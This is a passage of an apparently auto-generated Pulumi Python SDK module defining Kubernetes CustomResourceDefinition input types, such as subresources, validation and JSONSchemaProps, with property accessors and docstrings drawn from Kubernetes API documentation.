labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
"""
return pulumi.get(self, "label_selector_path")
@label_selector_path.setter
def label_selector_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_selector_path", value)
@pulumi.input_type
class CustomResourceSubresourcesPatchArgs:
def __init__(__self__, *,
scale: Optional[pulumi.Input['CustomResourceSubresourceScalePatchArgs']] = None,
status: Optional[Any] = None):
"""
CustomResourceSubresources defines the status and scale subresources for CustomResources.
:param pulumi.Input['CustomResourceSubresourceScalePatchArgs'] scale: scale indicates the custom resource should serve a `/scale` subresource that returns an `autoscaling/v1` Scale object.
:param Any status: status indicates the custom resource should serve a `/status` subresource. When enabled: 1. requests to the custom resource primary endpoint ignore changes to the `status` stanza of the object. 2. requests to the custom resource `/status` subresource ignore changes to anything other than the `status` stanza of the object.
"""
if scale is not None:
pulumi.set(__self__, "scale", scale)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def scale(self) -> Optional[pulumi.Input['CustomResourceSubresourceScalePatchArgs']]:
"""
scale indicates the custom resource should serve a `/scale` subresource that returns an `autoscaling/v1` Scale object.
"""
return pulumi.get(self, "scale")
@scale.setter
def scale(self, value: Optional[pulumi.Input['CustomResourceSubresourceScalePatchArgs']]):
pulumi.set(self, "scale", value)
@property
@pulumi.getter
def status(self) -> Optional[Any]:
"""
status indicates the custom resource should serve a `/status` subresource. When enabled: 1. requests to the custom resource primary endpoint ignore changes to the `status` stanza of the object. 2. requests to the custom resource `/status` subresource ignore changes to anything other than the `status` stanza of the object.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[Any]):
pulumi.set(self, "status", value)
@pulumi.input_type
class CustomResourceSubresourcesArgs:
def __init__(__self__, *,
scale: Optional[pulumi.Input['CustomResourceSubresourceScaleArgs']] = None,
status: Optional[Any] = None):
"""
CustomResourceSubresources defines the status and scale subresources for CustomResources.
:param pulumi.Input['CustomResourceSubresourceScaleArgs'] scale: scale indicates the custom resource should serve a `/scale` subresource that returns an `autoscaling/v1` Scale object.
:param Any status: status indicates the custom resource should serve a `/status` subresource. When enabled: 1. requests to the custom resource primary endpoint ignore changes to the `status` stanza of the object. 2. requests to the custom resource `/status` subresource ignore changes to anything other than the `status` stanza of the object.
"""
if scale is not None:
pulumi.set(__self__, "scale", scale)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def scale(self) -> Optional[pulumi.Input['CustomResourceSubresourceScaleArgs']]:
"""
scale indicates the custom resource should serve a `/scale` subresource that returns an `autoscaling/v1` Scale object.
"""
return pulumi.get(self, "scale")
@scale.setter
def scale(self, value: Optional[pulumi.Input['CustomResourceSubresourceScaleArgs']]):
pulumi.set(self, "scale", value)
@property
@pulumi.getter
def status(self) -> Optional[Any]:
"""
status indicates the custom resource should serve a `/status` subresource. When enabled: 1. requests to the custom resource primary endpoint ignore changes to the `status` stanza of the object. 2. requests to the custom resource `/status` subresource ignore changes to anything other than the `status` stanza of the object.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[Any]):
pulumi.set(self, "status", value)
@pulumi.input_type
class CustomResourceValidationPatchArgs:
def __init__(__self__, *,
open_apiv3_schema: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']] = None):
"""
CustomResourceValidation is a list of validation methods for CustomResources.
:param pulumi.Input['JSONSchemaPropsPatchArgs'] open_apiv3_schema: openAPIV3Schema is the OpenAPI v3 schema to use for validation and pruning.
"""
if open_apiv3_schema is not None:
pulumi.set(__self__, "open_apiv3_schema", open_apiv3_schema)
@property
@pulumi.getter(name="openAPIV3Schema")
def open_apiv3_schema(self) -> Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]:
"""
openAPIV3Schema is the OpenAPI v3 schema to use for validation and pruning.
"""
return pulumi.get(self, "open_apiv3_schema")
@open_apiv3_schema.setter
def open_apiv3_schema(self, value: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]):
pulumi.set(self, "open_apiv3_schema", value)
@pulumi.input_type
class CustomResourceValidationArgs:
def __init__(__self__, *,
open_apiv3_schema: Optional[pulumi.Input['JSONSchemaPropsArgs']] = None):
"""
CustomResourceValidation is a list of validation methods for CustomResources.
:param pulumi.Input['JSONSchemaPropsArgs'] open_apiv3_schema: openAPIV3Schema is the OpenAPI v3 schema to use for validation and pruning.
"""
if open_apiv3_schema is not None:
pulumi.set(__self__, "open_apiv3_schema", open_apiv3_schema)
@property
@pulumi.getter(name="openAPIV3Schema")
def open_apiv3_schema(self) -> Optional[pulumi.Input['JSONSchemaPropsArgs']]:
"""
openAPIV3Schema is the OpenAPI v3 schema to use for validation and pruning.
"""
return pulumi.get(self, "open_apiv3_schema")
@open_apiv3_schema.setter
def open_apiv3_schema(self, value: Optional[pulumi.Input['JSONSchemaPropsArgs']]):
pulumi.set(self, "open_apiv3_schema", value)
@pulumi.input_type
class ExternalDocumentationPatchArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
url: Optional[pulumi.Input[str]] = None):
"""
ExternalDocumentation allows referencing an external resource for extended documentation.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class ExternalDocumentationArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
url: Optional[pulumi.Input[str]] = None):
"""
ExternalDocumentation allows referencing an external resource for extended documentation.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class JSONSchemaPropsPatchArgs:
def __init__(__self__, *,
_ref: Optional[pulumi.Input[str]] = None,
_schema: Optional[pulumi.Input[str]] = None,
additional_items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
additional_properties: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
all_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]] = None,
any_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]] = None,
default: Optional[Any] = None,
definitions: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
dependencies: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enum: Optional[pulumi.Input[Sequence[Any]]] = None,
example: Optional[Any] = None,
exclusive_maximum: Optional[pulumi.Input[bool]] = None,
exclusive_minimum: Optional[pulumi.Input[bool]] = None,
external_docs: Optional[pulumi.Input['ExternalDocumentationPatchArgs']] = None,
format: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]] = None,
max_items: Optional[pulumi.Input[int]] = None,
max_length: Optional[pulumi.Input[int]] = None,
max_properties: Optional[pulumi.Input[int]] = None,
maximum: Optional[pulumi.Input[float]] = None,
min_items: Optional[pulumi.Input[int]] = None,
min_length: Optional[pulumi.Input[int]] = None,
min_properties: Optional[pulumi.Input[int]] = None,
minimum: Optional[pulumi.Input[float]] = None,
multiple_of: Optional[pulumi.Input[float]] = None,
not_: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']] = None,
nullable: Optional[pulumi.Input[bool]] = None,
one_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]] = None,
pattern: Optional[pulumi.Input[str]] = None,
pattern_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
required: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
title: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
unique_items: Optional[pulumi.Input[bool]] = None,
x_kubernetes_embedded_resource: Optional[pulumi.Input[bool]] = None,
x_kubernetes_int_or_string: Optional[pulumi.Input[bool]] = None,
x_kubernetes_list_map_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
x_kubernetes_list_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_map_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_preserve_unknown_fields: Optional[pulumi.Input[bool]] = None,
x_kubernetes_validations: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]]] = None):
"""
JSONSchemaProps is a JSON-Schema following Specification Draft 4 (http://json-schema.org/).
:param Any default: default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
:param pulumi.Input[str] format: format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
:param pulumi.Input[bool] x_kubernetes_embedded_resource: x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
:param pulumi.Input[bool] x_kubernetes_int_or_string: x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
:param pulumi.Input[Sequence[pulumi.Input[str]]] x_kubernetes_list_map_keys: x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
:param pulumi.Input[str] x_kubernetes_list_type: x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
:param pulumi.Input[str] x_kubernetes_map_type: x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
:param pulumi.Input[bool] x_kubernetes_preserve_unknown_fields: x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
:param pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]] x_kubernetes_validations: x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
if _ref is not None:
pulumi.set(__self__, "_ref", _ref)
if _schema is not None:
pulumi.set(__self__, "_schema", _schema)
if additional_items is not None:
pulumi.set(__self__, "additional_items", additional_items)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if all_of is not None:
pulumi.set(__self__, "all_of", all_of)
if any_of is not None:
pulumi.set(__self__, "any_of", any_of)
if default is not None:
pulumi.set(__self__, "default", default)
if definitions is not None:
pulumi.set(__self__, "definitions", definitions)
if dependencies is not None:
pulumi.set(__self__, "dependencies", dependencies)
if description is not None:
pulumi.set(__self__, "description", description)
if enum is not None:
pulumi.set(__self__, "enum", enum)
if example is not None:
pulumi.set(__self__, "example", example)
if exclusive_maximum is not None:
pulumi.set(__self__, "exclusive_maximum", exclusive_maximum)
if exclusive_minimum is not None:
pulumi.set(__self__, "exclusive_minimum", exclusive_minimum)
if external_docs is not None:
pulumi.set(__self__, "external_docs", external_docs)
if format is not None:
pulumi.set(__self__, "format", format)
if id is not None:
pulumi.set(__self__, "id", id)
if items is not None:
pulumi.set(__self__, "items", items)
if max_items is not None:
pulumi.set(__self__, "max_items", max_items)
if max_length is not None:
pulumi.set(__self__, "max_length", max_length)
if max_properties is not None:
pulumi.set(__self__, "max_properties", max_properties)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_items is not None:
pulumi.set(__self__, "min_items", min_items)
if min_length is not None:
pulumi.set(__self__, "min_length", min_length)
if min_properties is not None:
pulumi.set(__self__, "min_properties", min_properties)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if multiple_of is not None:
pulumi.set(__self__, "multiple_of", multiple_of)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if nullable is not None:
pulumi.set(__self__, "nullable", nullable)
if one_of is not None:
pulumi.set(__self__, "one_of", one_of)
if pattern is not None:
pulumi.set(__self__, "pattern", pattern)
if pattern_properties is not None:
pulumi.set(__self__, "pattern_properties", pattern_properties)
if properties is not None:
pulumi.set(__self__, "properties", properties)
if required is not None:
pulumi.set(__self__, "required", required)
if title is not None:
pulumi.set(__self__, "title", title)
if type is not None:
pulumi.set(__self__, "type", type)
if unique_items is not None:
pulumi.set(__self__, "unique_items", unique_items)
if x_kubernetes_embedded_resource is not None:
pulumi.set(__self__, "x_kubernetes_embedded_resource", x_kubernetes_embedded_resource)
if x_kubernetes_int_or_string is not None:
pulumi.set(__self__, "x_kubernetes_int_or_string", x_kubernetes_int_or_string)
if x_kubernetes_list_map_keys is not None:
pulumi.set(__self__, "x_kubernetes_list_map_keys", x_kubernetes_list_map_keys)
if x_kubernetes_list_type is not None:
pulumi.set(__self__, "x_kubernetes_list_type", x_kubernetes_list_type)
if x_kubernetes_map_type is not None:
pulumi.set(__self__, "x_kubernetes_map_type", x_kubernetes_map_type)
if x_kubernetes_preserve_unknown_fields is not None:
pulumi.set(__self__, "x_kubernetes_preserve_unknown_fields", x_kubernetes_preserve_unknown_fields)
if x_kubernetes_validations is not None:
pulumi.set(__self__, "x_kubernetes_validations", x_kubernetes_validations)
@property
@pulumi.getter(name="$ref")
def _ref(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "_ref")
@_ref.setter
def _ref(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "_ref", value)
@property
@pulumi.getter(name="$schema")
def _schema(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "_schema")
@_schema.setter
def _schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "_schema", value)
@property
@pulumi.getter(name="additionalItems")
def additional_items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
return pulumi.get(self, "additional_items")
@additional_items.setter
def additional_items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
pulumi.set(self, "additional_items", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter(name="allOf")
def all_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]:
return pulumi.get(self, "all_of")
@all_of.setter
def all_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]):
pulumi.set(self, "all_of", value)
@property
@pulumi.getter(name="anyOf")
def any_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]:
return pulumi.get(self, "any_of")
@any_of.setter
def any_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]):
pulumi.set(self, "any_of", value)
@property
@pulumi.getter
def default(self) -> Optional[Any]:
"""
default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
"""
return pulumi.get(self, "default")
@default.setter
def default(self, value: Optional[Any]):
pulumi.set(self, "default", value)
@property
@pulumi.getter
def definitions(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "definitions")
@definitions.setter
def definitions(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "definitions", value)
@property
@pulumi.getter
def dependencies(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]:
return pulumi.get(self, "dependencies")
@dependencies.setter
def dependencies(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]):
pulumi.set(self, "dependencies", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enum(self) -> Optional[pulumi.Input[Sequence[Any]]]:
return pulumi.get(self, "enum")
@enum.setter
def enum(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "enum", value)
@property
@pulumi.getter
def example(self) -> Optional[Any]:
return pulumi.get(self, "example")
@example.setter
def example(self, value: Optional[Any]):
pulumi.set(self, "example", value)
@property
@pulumi.getter(name="exclusiveMaximum")
def exclusive_maximum(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exclusive_maximum")
@exclusive_maximum.setter
def exclusive_maximum(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exclusive_maximum", value)
@property
@pulumi.getter(name="exclusiveMinimum")
def exclusive_minimum(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exclusive_minimum")
@exclusive_minimum.setter
def exclusive_minimum(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exclusive_minimum", value)
@property
@pulumi.getter(name="externalDocs")
def external_docs(self) -> Optional[pulumi.Input['ExternalDocumentationPatchArgs']]:
return pulumi.get(self, "external_docs")
@external_docs.setter
def external_docs(self, value: Optional[pulumi.Input['ExternalDocumentationPatchArgs']]):
pulumi.set(self, "external_docs", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[str]]:
"""
format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]:
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]):
pulumi.set(self, "items", value)
@property
@pulumi.getter(name="maxItems")
def max_items(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_items")
@max_items.setter
def max_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_items", value)
@property
@pulumi.getter(name="maxLength")
def max_length(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_length")
@max_length.setter
def max_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_length", value)
@property
@pulumi.getter(name="maxProperties")
def max_properties(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_properties")
@max_properties.setter
def max_properties(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_properties", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minItems")
def min_items(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_items")
@min_items.setter
def min_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_items", value)
@property
@pulumi.getter(name="minLength")
def min_length(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_length")
@min_length.setter
def min_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_length", value)
@property
@pulumi.getter(name="minProperties")
def min_properties(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_properties")
@min_properties.setter
def min_properties(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_properties", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter(name="multipleOf")
def multiple_of(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "multiple_of")
@multiple_of.setter
def multiple_of(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "multiple_of", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def nullable(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "nullable")
@nullable.setter
def nullable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "nullable", value)
@property
@pulumi.getter(name="oneOf")
def one_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]:
return pulumi.get(self, "one_of")
@one_of.setter
def one_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]]):
pulumi.set(self, "one_of", value)
@property
@pulumi.getter
def pattern(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "pattern")
@pattern.setter
def pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pattern", value)
@property
@pulumi.getter(name="patternProperties")
def pattern_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "pattern_properties")
@pattern_properties.setter
def pattern_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "pattern_properties", value)
@property
@pulumi.getter
def properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "properties", value)
@property
@pulumi.getter
def required(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "required")
@required.setter
def required(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "required", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="uniqueItems")
def unique_items(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "unique_items")
@unique_items.setter
def unique_items(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "unique_items", value)
@property
@pulumi.getter
def x_kubernetes_embedded_resource(self) -> Optional[pulumi.Input[bool]]:
"""
